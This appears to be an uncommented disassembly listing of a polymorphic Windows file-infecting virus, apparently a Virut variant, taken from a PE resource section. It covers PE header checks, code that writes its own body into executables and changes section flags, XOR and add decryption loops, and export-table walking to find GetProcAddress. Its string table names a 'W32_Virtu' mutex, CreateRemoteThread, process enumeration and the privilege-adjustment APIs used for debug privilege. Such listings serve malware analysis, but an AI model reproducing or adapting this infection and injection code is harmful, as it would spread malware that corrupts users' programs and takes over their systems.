sub_4213AD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4213BA: ; CODE XREF: .rsrc:004213DB�j
mov ecx, edi
jmp short loc_4213C9
; ---------------------------------------------------------------------------
lea edi, [ebp+104184h]
cld
loc_4213C5: ; CODE XREF: .rsrc:004213D7�j
mov ebx, edi
xor ecx, ecx
loc_4213C9: ; CODE XREF: .rsrc:004213BC�j
; .rsrc:004213DF�j
lodsb
cmp al, 61h
jb short loc_4213D4
cmp al, 7Ah
ja short loc_4213D4
sub al, 20h
loc_4213D4: ; CODE XREF: .rsrc:004213CC�j
; .rsrc:004213D0�j
stosb
cmp al, 5Ch
jz short loc_4213C5
cmp al, 2Eh
jz short loc_4213BA
cmp al, 0
jnz short loc_4213C9
jecxz short locret_4213AC
mov eax, [ecx]
cmp eax, 455845h
jz short loc_4213F7
cmp eax, 524353h
jnz locret_42132A
loc_4213F7: ; CODE XREF: .rsrc:004213EA�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_42132A
cmp eax, 4E554357h
jz locret_42132A
cmp eax, 32334357h
jz locret_42132A
cmp eax, 4F545350h
jz locret_42132A
xor ebx, ebx
call sub_421259
jnz short loc_42143E
call sub_42112D
call sub_421259
jz locret_42132A
loc_42143E: ; CODE XREF: .rsrc:0042142C�j
xor edx, edx
call sub_42145B
call sub_4213AD
call $+5
pop ebp
sub ebp, 10344Fh
jmp loc_421855
; =============== S U B R O U T I N E =======================================
sub_42145B proc near ; CODE XREF: .rsrc:00421440�p
var_1C = dword ptr -1Ch
push dword ptr fs:[edx]
mov esi, [ebp+1042B4h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_421855
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_421855
test dword ptr [ebx+16h], 2000h
jnz loc_421855
test byte ptr [ebx+5Ch], 2
jz loc_421855
mov eax, [ebx+8]
cmp eax, 0A0A0A0A0h
jz loc_421855
cmp eax, 20202020h
jz loc_421855
mov ecx, [ebx+0C8h]
jecxz short loc_4214D0
push ecx
call near ptr dword_420410+4
add ecx, [ebp+1042F8h]
add ecx, esi
and dword ptr [ecx+40h], 0
and dword ptr [ecx+44h], 0
loc_4214D0: ; CODE XREF: sub_42145B+5D�j
call sub_421370
jb loc_421855
and dword ptr [ebp+1042FCh], 0
mov eax, [edx+8]
mov ecx, [edx+10h]
sub eax, ecx
jnb short loc_4214F0
xor eax, eax
jmp short loc_4214F5
; ---------------------------------------------------------------------------
loc_4214F0: ; CODE XREF: sub_42145B+8F�j
add ecx, eax
mov [edx+10h], ecx
loc_4214F5: ; CODE XREF: sub_42145B+93�j
mov [ebp+1042BCh], eax
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call near ptr dword_41FB50+43h
xor [ebp+1039BEh], dl
mov cl, 20h
xor [ebp+1039BFh], dh
loc_421517: ; CODE XREF: sub_42145B+D5�j
push 20h
dec cl
pop eax
js short loc_421532
call near ptr dword_41FB50+43h
test edx, edx
setz dl
shl edx, cl
xor [ebp+1039C0h], edx
jmp short loc_421517
; ---------------------------------------------------------------------------
loc_421532: ; CODE XREF: sub_42145B+C1�j
test dword ptr [ebp+1039C0h], 2000000h
jz short loc_421560
test dword ptr [ebp+1039C0h], 3
jnz short loc_421556
and dword ptr [ebp+1039C0h], 0F7FFFFFFh
jmp short loc_421560
; ---------------------------------------------------------------------------
loc_421556: ; CODE XREF: sub_42145B+ED�j
or dword ptr [ebp+1039C0h], 10000000h
loc_421560: ; CODE XREF: sub_42145B+E1�j
; sub_42145B+F9�j ...
push 6
pop ecx
loc_421566: ; CODE XREF: sub_42145B+129�j
push 6
pop eax
call near ptr dword_41FB50+43h
mov al, [ebp+1039B8h]
xchg al, [edx+ebp+1039B8h]
mov [ebp+1039B8h], al
loop loc_421566
test dword ptr [ebp+1039C0h], 8
jnz short loc_42159B
cmp byte ptr [ebp+1039BAh], 1
jz short loc_421560
loc_42159B: ; CODE XREF: sub_42145B+135�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_4215C2
cmp byte ptr [ebp+1039B8h], 5
jz short loc_421560
cmp byte ptr [ebp+1039B9h], 5
jz short loc_421560
cmp byte ptr [ebp+1039BAh], 5
jz short loc_421560
loc_4215C2: ; CODE XREF: sub_42145B+14A�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_4215D7
cmp byte ptr [ebp+1039B8h], 2
ja short loc_421560
loc_4215D7: ; CODE XREF: sub_42145B+171�j
and dword ptr [ebp+104300h], 0
call loc_420855
call loc_42132B
call sub_42185E
mov ebx, [ebp+1042B8h]
add ebx, [ebp+1042BCh]
call sub_421259
jz loc_421855
mov esi, [ebp+1042B4h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_421370
jb loc_421855
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_42164B
mov [ebp+104304h], edi
lea esi, [ebp+1039CCh]
mov ecx, [ebp+101069h]
rep movsb
loc_42164B: ; CODE XREF: sub_42145B+1DA�j
push edi
mov ecx, 0A73h
lea esi, [ebp+101000h]
rep movsd
mov cl, 0
jecxz short loc_42165F
rep movsb
loc_42165F: ; CODE XREF: sub_42145B+200�j
test dword ptr [ebp+1039C0h], 20000000h
jz loc_42171D
push dword ptr [ebx+28h]
call near ptr dword_420410+4
mov edx, [ebp+1042F4h]
test edx, edx
jz loc_42171D
mov esi, [ebp+1042B4h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_42169C
xor ecx, ecx
loc_42169C: ; CODE XREF: sub_42145B+23D�j
add esi, [edx+14h]
cmp ecx, [ebp+101069h]
mov ecx, [ebp+101069h]
jb short loc_421703
mov edi, [esp+1Ch+var_1C]
and dword ptr [ebp+101069h], 0
and dword ptr [edi+69h], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+1042C8h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_4216DC
neg dword ptr [eax]
loc_4216DC: ; CODE XREF: sub_42145B+27D�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+104300h], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+1039C0h], 40h
jz short loc_4216FA
neg dword ptr [eax]
loc_4216FA: ; CODE XREF: sub_42145B+29B�j
push ecx
call loc_42132B
pop ecx
jmp short loc_42170F
; ---------------------------------------------------------------------------
loc_421703: ; CODE XREF: sub_42145B+250�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_42170F: ; CODE XREF: sub_42145B+2A6�j
lea esi, [ebp+1039CCh]
mov [ebp+104304h], edi
rep movsb
loc_42171D: ; CODE XREF: sub_42145B+20E�j
; sub_42145B+224�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+137h]
cmp dl, [ebp+1039BEh]
jnz short loc_421736
imul edx, 12345678h
loc_421736: ; CODE XREF: sub_42145B+2D3�j
mov [eax-19h], dx
call sub_41F120
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
lea eax, [ecx+5]
jnz short loc_421768
mov [ebp+104300h], ecx
add eax, [ebp+101069h]
and dword ptr [edi+69h], 0
loc_421768: ; CODE XREF: sub_42145B+2F8�j
sub eax, [ebx+28h]
mov [edi+54h], eax
test dword ptr [ebp+103F7Ch], 1
jz short loc_421784
mov dword ptr [ebx+8], 0A0A0A0A0h
loc_421784: ; CODE XREF: sub_42145B+320�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_421797
push edx
call sub_420EF1
pop edx
loc_421797: ; CODE XREF: sub_42145B+333�j
mov ecx, [ebp+104300h]
jecxz short loc_4217A4
mov [ebx+28h], ecx
jmp short loc_4217B1
; ---------------------------------------------------------------------------
loc_4217A4: ; CODE XREF: sub_42145B+342�j
mov ecx, [ebp+1042FCh]
jecxz short loc_4217AE
jmp short loc_4217B1
; ---------------------------------------------------------------------------
loc_4217AE: ; CODE XREF: sub_42145B+34F�j
mov ecx, [ebx+28h]
loc_4217B1: ; CODE XREF: sub_42145B+347�j
; sub_42145B+351�j
test dword ptr [ebp+1039C0h], 3
jz short loc_4217D1
mov eax, [ebp+104304h]
add ecx, [ebp+1042ECh]
add eax, [ebp+1042E8h]
add [eax], ecx
loc_4217D1: ; CODE XREF: sub_42145B+360�j
mov ecx, [edx+10h]
mov eax, [ebp+1042B8h]
cmp [edx+8], ecx
jnb short loc_4217E2
mov [edx+8], ecx
loc_4217E2: ; CODE XREF: sub_42145B+382�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+1042C0h]
push 29CCh
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+1039BEh]
test dword ptr [ebp+1039C0h], 20000000h
jz short loc_421813
add ecx, [ebp+101069h]
loc_421813: ; CODE XREF: sub_42145B+3B0�j
mov dh, 0
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_421835
inc dh
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_421835
mov dh, [ebp+1039BFh]
loc_421835: ; CODE XREF: sub_42145B+3C4�j
; sub_42145B+3D2�j
test dword ptr [ebp+1039C0h], 4000h
jnz short loc_42184C
loc_421841: ; CODE XREF: sub_42145B+3ED�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_421841
jmp short loc_421855
; ---------------------------------------------------------------------------
loc_42184C: ; CODE XREF: sub_42145B+3E4�j
; sub_42145B+3F8�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_42184C
loc_421855: ; CODE XREF: .rsrc:00421456�j
; sub_42145B+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_42145B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42185E proc near ; CODE XREF: sub_42145B+18D�p
cmp dword ptr [ebp+104298h], 0
jz locret_42132A
push dword ptr [ebp+1042B4h]
call dword ptr [ebp+103EEEh]
loc_421877: ; CODE XREF: sub_421259+C5�j
push dword ptr [ebp+1042B0h]
call dword ptr [ebp+103E62h]
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EE2h]
loc_42189F: ; CODE XREF: sub_421259+6B�j
; sub_421259+82�j ...
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E62h]
loc_4218AB: ; CODE XREF: sub_421259+45�j
lea esi, [ebp+104184h]
push dword ptr [ebp+104294h]
push esi
call dword ptr [ebp+103EDEh]
and dword ptr [ebp+104298h], 0
retn
sub_42185E endp
; ---------------------------------------------------------------------------
dw 0E8h
dd 5D000000h, 0ED81016Ah, 1038CBh, 0C10FF058h, 10158885h
dd 0C3C08500h, 0F0FFC883h, 8885C10Fh, 0C3001015h, 2A00103Dh
dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh
dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 0DB81234h
dd 6003694Dh, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104184B5h
dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
dd 0FF505200h, 103F2E95h, 8C48300h, 3F5C3E81h, 3755C3Fh
dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 36946DFh
dd 8FB8B1EBh, 0E803694Ch, 1Dh, 0B80020C2h, 30h, 10E8h
dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 0A2ED811Ah
dd 0E8001039h, 0FFFFE0B3h, 4C261h, 5030107h, 2CD60602h
dd 0FFB1C20Ah, 106815FFh, 0FF8B0100h, 28E8FCh, 0B9530000h
dd 0DA5h, 3166DA8Bh, 2408D10h, 148DD686h, 5BF3E213h, 5DEBBFC3h
dd 0B855C3h, 33000080h, 0F2AEBC9h, 0C085C331h, 2CCD0875h
dd 0E979C085h, 0F500FEBh, 0FE244C01h, 6408B58h, 7910E0C1h
dd 0DCE855D8h, 91FFFFFFh, 0FFFFD6E8h, 8BC12BFFh, 8104246Ch
dd 0D804246Ch, 2D000156h, 100h, 0ED81B573h, 301006h, 1082858Dh
dd 8B660030h, 0FFFF9B90h, 0FF84E8FFh, 0EB54FFFFh, 9E4EF721h
dd 0B115B5D4h, 6AA6FEFFh, 0E231E191h, 41FDD65Dh, 0C10210h
dd 0AA2F265Bh, 390F0CDEh, 60D8178Dh, 0E4E6B6E0h, 0B21B0875h
dd 0E8BF85ADh, 0F22FCCACh, 0A3112E31h, 0B72D5CF3h, 4F55h
dd 5Ch dup(0)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call sub_421C17
call sub_421C56
push dword ptr fs:0
pop ebp
lea ebp, [ebp+8]
; =============== S U B R O U T I N E =======================================
sub_421C17 proc near ; CODE XREF: .rsrc:00421C03�p
sub edi, edi
sub ecx, ecx
mov cl, 2Dh
loc_421C1D: ; CODE XREF: sub_421C17+7�j
inc edi
loop loc_421C1D
call $+5
pop ebx
add ebx, 3Eh
sub edx, edx
xor edx, 243Ch
push ebx
loc_421C35: ; CODE XREF: sub_421C17+2D�j
mov al, [ebx]
xor ax, di
mov [ebx], al
inc ebx
inc edi
sub edx, 1
cmp edx, 0
jnz short loc_421C35
pop ebx
mov esp, fs:0
pop dword ptr fs:0
leave
jmp ebx
sub_421C17 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_421C56 proc near ; CODE XREF: .rsrc:00421C08�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_421C56 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
call $+5
mov eax, [esp]
test dword ptr [eax+242Bh], 80000000h
mov [eax+29ACh], ebx
mov ebx, [esp+4]
jz short loc_421CAF
cld
pop ecx
mov [eax+29B0h], esi
mov [eax+29B4h], edi
cmp byte ptr [eax+242Fh], 0E8h
jnz short loc_421CA6
add ebx, [eax+2430h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_421CAE
; ---------------------------------------------------------------------------
loc_421CA6: ; CODE XREF: .rsrc:00421C97�j
mov ebx, [eax+2431h]
push dword ptr [ebx]
loc_421CAE: ; CODE XREF: .rsrc:00421CA4�j
pop ebx
loc_421CAF: ; CODE XREF: .rsrc:00421C80�j
push ebp
xchg eax, ebp
sub dword ptr [esp+4], 9C69h
and ebx, 0FFFFF000h
sub ebp, 401006h
mov edi, [esp+4]
lea esi, loc_40343C[ebp]
mov ecx, 0
rep movsb
loc_421CD6: ; CODE XREF: .rsrc:00421CF2�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_421CEC
mov eax, [ebx+3Ch]
lea eax, [eax+ebx]
cmp word ptr [eax], 4550h
jz short loc_421CF4
loc_421CEC: ; CODE XREF: .rsrc:00421CDD�j
sub ebx, 100h
jnz short loc_421CD6
loc_421CF4: ; CODE XREF: .rsrc:00421CEA�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_421D02: ; CODE XREF: .rsrc:loc_421D29�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_421D29
cmp dword ptr [eax+3], 636F7250h
jnz short loc_421D29
cmp dword ptr [eax+7], 72646441h
jnz short loc_421D29
cmp dword ptr [eax+0Bh], 737365h
jz short loc_421D2E
loc_421D29: ; CODE XREF: .rsrc:00421D0C�j
; .rsrc:00421D15�j ...
loop loc_421D02
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_421D2E: ; CODE XREF: .rsrc:00421D27�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_421D54+2
inc ebx
insb
outsd
jnb short near ptr loc_421DB2+2
dec eax
popa
outsb
db 64h
insb
loc_421D54: ; CODE XREF: .rsrc:00421D45�p
add gs:[ebx-1], dl
setalc
mov [ebp+40353Ch], eax
call near ptr loc_421D70+1
inc ebx
jb short near ptr loc_421DCB+1
popa
jz short near ptr loc_421DCB+4
inc ebp
jbe short near ptr loc_421DD1+1
outsb
jz short near ptr loc_421DAF+2
loc_421D70: ; CODE XREF: .rsrc:00421D5F�p
add [ebx-1], dl
setalc
mov [ebp+403540h], eax
call sub_421D8C
inc edi
db 65h
jz short near ptr loc_421DCB+4
popa
jnb short loc_421DFA
inc ebp
jb short near ptr loc_421DFA+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_421D8C proc near ; CODE XREF: .rsrc:00421D7A�p
var_26 = byte ptr -26h
var_4 = dword ptr -4
arg_5 = byte ptr 9
arg_E = byte ptr 12h
; FUNCTION CHUNK AT 00421E35 SIZE 000000DA BYTES
; FUNCTION CHUNK AT 00421F1E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00421F57 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00421F70 SIZE 00000005 BYTES
push ebx
call esi ; GetProcAddress
mov [ebp+403544h], eax
call sub_421E0A
test eax, eax
jz short loc_421DBF
push eax
call dword ptr [ebp+403544h]
test eax, eax
jnz short loc_421DB9
lea eax, loc_4011D2[ebp]
loc_421DAF: ; CODE XREF: .rsrc:00421D6E�j
mov dl, [eax-1]
loc_421DB2: ; CODE XREF: .rsrc:00421D4D�j
call sub_421E25
jmp short loc_421E35
; ---------------------------------------------------------------------------
loc_421DB9: ; CODE XREF: sub_421D8C+1B�j
; .rsrc:00421F60�j ...
call dword ptr [ebp+40353Ch]
loc_421DBF: ; CODE XREF: sub_421D8C+10�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_421DE9
loc_421DCB: ; CODE XREF: .rsrc:00421D65�j
; .rsrc:00421D68�j ...
lea esi, loc_403435[ebp]
loc_421DD1: ; CODE XREF: .rsrc:00421D6B�j
mov edi, [esp+8+var_4]
movsb
movsd
mov ebx, [ebp+4039B2h]
mov esi, [ebp+4039B6h]
mov edi, dword ptr ss:loc_4039BA[ebp]
loc_421DE9: ; CODE XREF: sub_421D8C+3D�j
pop ebp
retn
sub_421D8C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_421DEB: ; CODE XREF: sub_421E0A+2�p
; .rsrc:loc_421FF4�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
; ---------------------------------------------------------------------------
db 8Bh
; ---------------------------------------------------------------------------
loc_421DFA: ; CODE XREF: .rsrc:00421D84�j
; .rsrc:00421D87�j
les ebp, [edx+0]
push eax
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
aVt_3 db 'VT_3',0
align 2
; =============== S U B R O U T I N E =======================================
sub_421E0A proc near ; CODE XREF: sub_421D8C+9�p
xor ecx, ecx
call loc_421DEB
lea edx, loc_4011A1[ebp]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+403540h]
add esp, 20h
retn
sub_421E0A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_421E25 proc near ; CODE XREF: sub_421D8C:loc_421DB2�p
; sub_423BF9+25B�p
mov dh, dl
mov ecx, 225Fh
loc_421E2C: ; CODE XREF: sub_421E25+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_421E2C
retn
sub_421E25 endp
; ---------------------------------------------------------------------------
db 0E2h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D8C
loc_421E35: ; CODE XREF: sub_421D8C+2B�j
and dword ptr ss:loc_401580[ebp], 0
and dword ptr ss:loc_401584[ebp], 0
and dword ptr [ebp+401588h], 0
mov eax, [ebp+403431h]
loc_421E50: ; CODE XREF: sub_421D8C+121�j
xor ecx, ecx
push 1
mov cl, 20h
pop dword ptr ss:loc_40397E[ebp]
xor edx, edx
shr eax, 1
setb byte ptr [edi-65h]
cmp byte ptr [ebp+ebp*4+8], 83h ; CODE XREF: sub_421D8C+135�j
jl short near ptr loc_421E98+4
add edx, [ecx-7F525F84h]
jl short near ptr loc_421E84+2
inc eax
add [ecx], al
mov [ebp-4249CAB8h], esi
cmp [esp+8+arg_E], 80h ; CODE XREF: sub_421D8C+111�j
loc_421E81: ; CODE XREF: sub_421D8C+171�j
jl short near ptr loc_421EDC+3
xchg eax, esp
loc_421E84: ; CODE XREF: sub_421D8C+E5�j
cmp byte ptr [edi+23h], 80h
jl short near ptr loc_421EB3+4
add al, 81h
jl short near ptr loc_421EC3+3
push es
cmp dword ptr [edi+ecx+4Bh], 0C0587C86h ; CODE XREF: sub_421D8C+12D�j
loc_421E98: ; CODE XREF: sub_421D8C+DD�j
cmp byte ptr [esp+ebp*8-19h], 80h
jl short near ptr loc_421E7C+1 ; CODE XREF: sub_421D8C+17D�j
stosd
cmp [esp+edi+0Ch+arg_5], 81h
jl short loc_421F1E
or al, [ecx-7CE3BA84h]
jl short loc_421E50
mov dh, 80h
jl short near ptr loc_421EB1+1 ; CODE XREF: sub_421D8C:loc_421EB1�j
loc_421EB3: ; CODE XREF: sub_421D8C+FD�j
or [esi-7CA23584h], al
jl short near ptr loc_421E90+5
adc [ecx-7ED52184h], eax ; CODE XREF: sub_421D8C+149�j
jl short near ptr loc_421E64+4
loc_421EC3: ; CODE XREF: sub_421D8C+101�j
sbb eax, [edx-7FE28884h]
jl short loc_421ED0
mov ecx, 0BB767C80h
loc_421ED0: ; CODE XREF: sub_421D8C+13D�j
cmp byte ptr [ecx+9], 83h
jl short near ptr loc_421EBB+1
cmp eax, 3F587C86h
loc_421EDC: ; CODE XREF: sub_421D8C:loc_421E81�j
xchg bh, [edx+eax*4+27h]
cmp dword ptr [eax+edi*4+1Ch], 24427C83h
cmp byte ptr [esp+ebx+0Ch+var_4+3], 81h
jl short near ptr loc_421F60+3
mov ecx, 9A517C80h
cmp byte ptr [edi+eax*4+0Dh], 81h
jl short near ptr loc_421F58+3
aam 90h
jl short loc_421E81
setalc
nop
jl short loc_421F57
xlat
nop
jl short loc_421F70
xlat
nop
jl short near ptr loc_421E9D+1
xlat
nop
jl short $+2
; END OF FUNCTION CHUNK FOR sub_421D8C
; ---------------------------------------------------------------------------
db 0
dd 0DC550000h, 0DCFD7C90h, 0DD907C90h
db 90h
db 7Ch
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D8C
loc_421F1E: ; CODE XREF: sub_421D8C+119�j
mov edx, 0B67C90DDh
ficom word ptr [eax-6F1FBA84h]
jl short near ptr byte_421F5D
jmp far ptr 7C91h:30C67C90h
; END OF FUNCTION CHUNK FOR sub_421D8C
; ---------------------------------------------------------------------------
dw 0FFFFh
dd 6850006Ah, 40000h, 0E8C1006Ah, 16A570Ch, 16850h, 95FF0001h
dd 403550h, 1000A68h
db 0, 0FFh, 95h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D8C
loc_421F57: ; CODE XREF: sub_421D8C+175�j
push eax
loc_421F58: ; CODE XREF: sub_421D8C+16D�j
xor eax, 5E80040h
; END OF FUNCTION CHUNK FOR sub_421D8C
; ---------------------------------------------------------------------------
byte_421F5D db 3 dup(0) ; CODE XREF: sub_421D8C+19D�j
; ---------------------------------------------------------------------------
loc_421F60: ; CODE XREF: sub_421D8C+161�j
jmp loc_421DB9
; ---------------------------------------------------------------------------
db 6Ah, 1, 59h
dd 0A6A0AE3h, 35BC95FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D8C
loc_421F70: ; CODE XREF: sub_421D8C+179�j
inc eax
add bl, ch
icebp
retn
; END OF FUNCTION CHUNK FOR sub_421D8C
; ---------------------------------------------------------------------------
cmp dword ptr [ebp+403570h], 0
jz loc_421DB9
call near ptr loc_421F8C+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_421F8C: ; CODE XREF: .rsrc:00421F82�p
add bh, bh
xchg eax, ebp
mov ds:0B58D0040h, dh
jnb short near ptr loc_421FA9+5
inc eax
add [ebx], dh
leave
lea edi, [ebp+4035D0h]
mov cl, 0Bh
xchg eax, ebx
call sub_4221EF
loc_421FA9: ; CODE XREF: .rsrc:00421F95�j
cmp dword ptr ss:loc_4035F8[ebp], 0
jz loc_421DB9
mov eax, [ebp+4035D4h]
push dword ptr [eax+1]
pop dword ptr [ebp+403395h]
mov eax, dword ptr ss:loc_4035E8[ebp]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E2h]
mov eax, dword ptr ss:loc_4035D8[ebp]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E9h]
mov ecx, [ebp+4035DCh]
jecxz short loc_421FF4
push dword ptr [ecx+1]
pop dword ptr [ebp+4033F6h]
loc_421FF4: ; CODE XREF: .rsrc:00421FE9�j
call loc_421DEB
lea edi, loc_40364E[ebp]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+40159Fh]
mov ecx, 1Ch
mov edx, esp
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
loc_422039: ; CODE XREF: .rsrc:0042203C�j
lodsb
stosw
loop loc_422039
push 0
push 69CEh
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr ss:loc_4035E0[ebp]
pop eax
add esp, 40h
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
test edi, edi
jz loc_421DB9
lea esi, sub_401000[ebp]
mov ecx, 0A74h
mov ebp, edi
rep movsd
sub ebp, offset sub_401000
lea eax, loc_40144C[ebp]
jmp eax
; ---------------------------------------------------------------------------
db 8Dh
db 95h ; •
dd offset loc_4018DB+5
db 52h, 0FFh, 95h
dd offset locret_40359B+1
db 0E8h ; è
db 16h, 2 dup(0)
db 0
aLookupprivileg db 'LookupPrivilegeValueA',0
db 50h
dd 354895FFh, 85890040h, 40354Ch, 206A5450h, 95FFFF6Ah
dd 4035ECh, 755FC085h, 26A963Fh, 0D48B5656h, 0E852016Ah
dd 11h, 65446553h, 50677562h, 69766972h, 6567656Ch, 95FF5600h
dd 40354Ch, 5656C48Bh, 57565056h, 35D095FFh, 0C4830040h
dd 95FF5710h, 40353Ch, 26A006Ah, 357095FFh, 28B90040h
dd 97000001h, 0C89E12Bh, 0FF575424h, 4035AC95h, 83F63300h
dd 40363CA5h, 57540000h, 35B095FFh, 0C0850040h, 83465C74h
dd 0EE7204FEh, 82474FFh, 2A6A006Ah, 35A895FFh, 0C0850040h
dd 0E893DC74h, 43Dh, 0E391C933h, 3C853930h, 75004036h
dd 0AEC18128h, 5000000Dh, 51565054h, 0FF535050h, 40356895h
dd 59C08500h, 74FF0F74h, 858F0824h, 40363Ch, 0FFFDACE8h
dd 95FF53FFh, 40353Ch, 0C48198EBh, 128h, 3C95FF57h, 0E9004035h
dd 0FFFFFBE5h, 5800498Dh, 0CE005858h, 65000029h, 0Dh, 2 dup(0)
db 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_4221EF proc near ; CODE XREF: .rsrc:00421FA4�p
; sub_4221EF+10�j
push ecx
push esi
push ebx
call dword ptr [ebp+403548h]
stosd
pop ecx
loc_4221FA: ; CODE XREF: sub_4221EF+E�j
lodsb
test al, al
jnz short loc_4221FA
loop sub_4221EF
retn
sub_4221EF endp
; ---------------------------------------------------------------------------
aBasenamedobjec db '\BaseNamedObjects\W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremoteth db 'CreateRemoteThread',0
aCreatethread_0 db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehan_0 db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGQ db 'G>Q',0
align 4
aRsion db 'rsion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenfile db 'NtOpenFile',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
